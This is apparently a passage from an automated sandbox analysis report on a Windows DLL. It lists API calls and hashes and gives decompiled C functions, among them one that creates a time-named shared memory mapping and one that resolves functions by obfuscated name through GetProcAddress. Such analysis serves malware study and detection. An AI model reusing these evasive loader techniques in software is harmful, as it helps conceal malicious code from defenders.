                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24573A
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24574C
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24575E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245770
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245782
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245794
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2457A6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242973
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242995
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429AA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429B5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429EA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429F8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A03
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A3B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A42
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A5F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A77
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction ID: a63bd5db076cb06e5093edef45ccf21baba3bcc49aedbfc37e97efda839b46bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E3190B260031ADFEB648BB6DC40B8673EABF00355F314D19E869D7154DB31E8408F14
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2395CB
                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6E2395F2
                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6E2396FE
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239753
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2397D9
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6E239860
                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6E23987B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction ID: c30f1c125f4d8d96e09fbba9d648f03eba2003405368d434e649a846f3ba32d9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3C17AB5C0422EAFCF15CFE4C88099EBB7ABF46315F20455AE8116B249DB31DA61CF91
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D27E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D28A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D295
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2A0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2AB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2B6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2CC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2E5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction ID: 97eae551447f59d9f4220a35069cb2041860641c9e00c284b1040b41b4561110
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 052187BA94011CAFCF41DFE4D890DDD7BBAFF08244B218566E9199B121DB31DA55CF80
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f032beec8e7be82919b742781db431c000ba9a4d0a581797c3dbcd09a25ed867
                                                                                                                                                                                                                                                                    • Instruction ID: 19ec7bd6c306872e3df39dc9319bac30a882b955fdce2cc641e6d8f66d2fe56b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f032beec8e7be82919b742781db431c000ba9a4d0a581797c3dbcd09a25ed867
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EC1BFB490421EDFDB09CFE8C894FADBBB6BF99304F104459E4159B281E7709981CF62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                    			E6E1F1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                                                                                    				L6E1F2210();
                                                                                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                                                    				_t15 =  *0x6e1f41d0;
                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e1f505e);
                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e1f5054);
                                                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                                                    				L6E1F220A();
                                                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t34 = CreateFileMappingW(0xffffffff, 0x6e1f41c0, 4, 0, _t18,  &_v60);
                                                                                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                    0x6e1f1979
                                                                                                                                                                                                                                                                    0x6e1f1982
                                                                                                                                                                                                                                                                    0x6e1f1986
                                                                                                                                                                                                                                                                    0x6e1f198c
                                                                                                                                                                                                                                                                    0x6e1f1991
                                                                                                                                                                                                                                                                    0x6e1f1996
                                                                                                                                                                                                                                                                    0x6e1f1999
                                                                                                                                                                                                                                                                    0x6e1f199c
                                                                                                                                                                                                                                                                    0x6e1f19a1
                                                                                                                                                                                                                                                                    0x6e1f19a2
                                                                                                                                                                                                                                                                    0x6e1f19a5
                                                                                                                                                                                                                                                                    0x6e1f19b0
                                                                                                                                                                                                                                                                    0x6e1f19b7
                                                                                                                                                                                                                                                                    0x6e1f19bb
                                                                                                                                                                                                                                                                    0x6e1f19bd
                                                                                                                                                                                                                                                                    0x6e1f19be
                                                                                                                                                                                                                                                                    0x6e1f19c1
                                                                                                                                                                                                                                                                    0x6e1f19c6
                                                                                                                                                                                                                                                                    0x6e1f19d0
                                                                                                                                                                                                                                                                    0x6e1f19d2
                                                                                                                                                                                                                                                                    0x6e1f19d2
                                                                                                                                                                                                                                                                    0x6e1f19ec
                                                                                                                                                                                                                                                                    0x6e1f19f0
                                                                                                                                                                                                                                                                    0x6e1f1a40
                                                                                                                                                                                                                                                                    0x6e1f19f2
                                                                                                                                                                                                                                                                    0x6e1f19fb
                                                                                                                                                                                                                                                                    0x6e1f1a11
                                                                                                                                                                                                                                                                    0x6e1f1a19
                                                                                                                                                                                                                                                                    0x6e1f1a2b
                                                                                                                                                                                                                                                                    0x6e1f1a2f
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1a1b
                                                                                                                                                                                                                                                                    0x6e1f1a1e
                                                                                                                                                                                                                                                                    0x6e1f1a23
                                                                                                                                                                                                                                                                    0x6e1f1a25
                                                                                                                                                                                                                                                                    0x6e1f1a25
                                                                                                                                                                                                                                                                    0x6e1f1a06
                                                                                                                                                                                                                                                                    0x6e1f1a08
                                                                                                                                                                                                                                                                    0x6e1f1a31
                                                                                                                                                                                                                                                                    0x6e1f1a32
                                                                                                                                                                                                                                                                    0x6e1f1a32
                                                                                                                                                                                                                                                                    0x6e1f19fb
                                                                                                                                                                                                                                                                    0x6e1f1a48

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?,?), ref: 6E1F1986
                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1F199C
                                                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 6E1F19C1
                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,6E1F41C0,00000004,00000000,?,?), ref: 6E1F19E6
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?), ref: 6E1F19FD
                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1F1A11
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?), ref: 6E1F1A29
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A), ref: 6E1F1A32
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?), ref: 6E1F1A3A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                                                                                    • Opcode ID: 68f89030acfe3fb8c27aa376681359d5de45a3bc397ed62f39a972bf656250aa
                                                                                                                                                                                                                                                                    • Instruction ID: 1bfc2ea3b24f93cbbc2af52589c79e5bc9c2e309edfcca72fa47b8207165f42e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68f89030acfe3fb8c27aa376681359d5de45a3bc397ed62f39a972bf656250aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5621C1B2600148FFDB00AFD8DC88E9E37ECEB45354F218026F616E7141D6705886ABE1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E245818: _free.LIBCMT ref: 6E24583D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24589E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458A9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458B4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245908
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245913
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24591E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245929
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction ID: e200c28aa309deb199ffb0a7d1aae8d8150d25cca04757747193a0a81902d3e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0116DB5590B0CEBE725A7F0DC06FCB779EAF00704F508C14A6EE66050DB65A5454F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E243593
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E243772
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E24378F
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,6E23F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2437D7
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E243817
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2438C3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4031098158-0
                                                                                                                                                                                                                                                                    • Opcode ID: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction ID: 0d1e64fe4c333ceb160657491c870788f40800a22dbcda45e6c6c0ff1a012c30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D187B5D0025EDFCF19CFE8C8849EDFBB6BF49314F24016AE855AB241D630AA46CB50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t56 = E6E1F1C8F(0x20);
                                                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x6e1f41d0 + 0x6e1f5014);
                                                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f50e1);
                                                                                                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                    						E6E1F136A(_t56);
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f50f1);
                                                                                                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f5104);
                                                                                                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f5119);
                                                                                                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f512f);
                                                                                                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                                    										_t46 = E6E1F18D1(_t56, _a12);
                                                                                                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                    0x6e1f1ab3
                                                                                                                                                                                                                                                                    0x6e1f1ab7
                                                                                                                                                                                                                                                                    0x6e1f1b78
                                                                                                                                                                                                                                                                    0x6e1f1abd
                                                                                                                                                                                                                                                                    0x6e1f1ad5
                                                                                                                                                                                                                                                                    0x6e1f1ae4
                                                                                                                                                                                                                                                                    0x6e1f1aeb
                                                                                                                                                                                                                                                                    0x6e1f1aef
                                                                                                                                                                                                                                                                    0x6e1f1af2
                                                                                                                                                                                                                                                                    0x6e1f1b70
                                                                                                                                                                                                                                                                    0x6e1f1b71
                                                                                                                                                                                                                                                                    0x6e1f1af4
                                                                                                                                                                                                                                                                    0x6e1f1b01
                                                                                                                                                                                                                                                                    0x6e1f1b05
                                                                                                                                                                                                                                                                    0x6e1f1b08
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b0a
                                                                                                                                                                                                                                                                    0x6e1f1b17
                                                                                                                                                                                                                                                                    0x6e1f1b1b
                                                                                                                                                                                                                                                                    0x6e1f1b1e
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b20
                                                                                                                                                                                                                                                                    0x6e1f1b2d
                                                                                                                                                                                                                                                                    0x6e1f1b31
                                                                                                                                                                                                                                                                    0x6e1f1b34
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b36
                                                                                                                                                                                                                                                                    0x6e1f1b43
                                                                                                                                                                                                                                                                    0x6e1f1b47
                                                                                                                                                                                                                                                                    0x6e1f1b4a
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b4c
                                                                                                                                                                                                                                                                    0x6e1f1b52
                                                                                                                                                                                                                                                                    0x6e1f1b58
                                                                                                                                                                                                                                                                    0x6e1f1b5d
                                                                                                                                                                                                                                                                    0x6e1f1b64
                                                                                                                                                                                                                                                                    0x6e1f1b67
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b69
                                                                                                                                                                                                                                                                    0x6e1f1b6c
                                                                                                                                                                                                                                                                    0x6e1f1b6c
                                                                                                                                                                                                                                                                    0x6e1f1b67
                                                                                                                                                                                                                                                                    0x6e1f1b4a
                                                                                                                                                                                                                                                                    0x6e1f1b34
                                                                                                                                                                                                                                                                    0x6e1f1b1e
                                                                                                                                                                                                                                                                    0x6e1f1b08
                                                                                                                                                                                                                                                                    0x6e1f1af2
                                                                                                                                                                                                                                                                    0x6e1f1b86

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1C8F: HeapAlloc.KERNEL32(00000000,?,6E1F117D,?,00000000,00000000,?,?,?,6E1F1810), ref: 6E1F1C9B
                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1F1272,?,?,?,?), ref: 6E1F1AC9
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1AEB
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B01
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B17
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B2D
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B43
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F18D1: memset.NTDLL ref: 6E1F1950
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$AllocHandleHeapModulememset
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 426539879-0
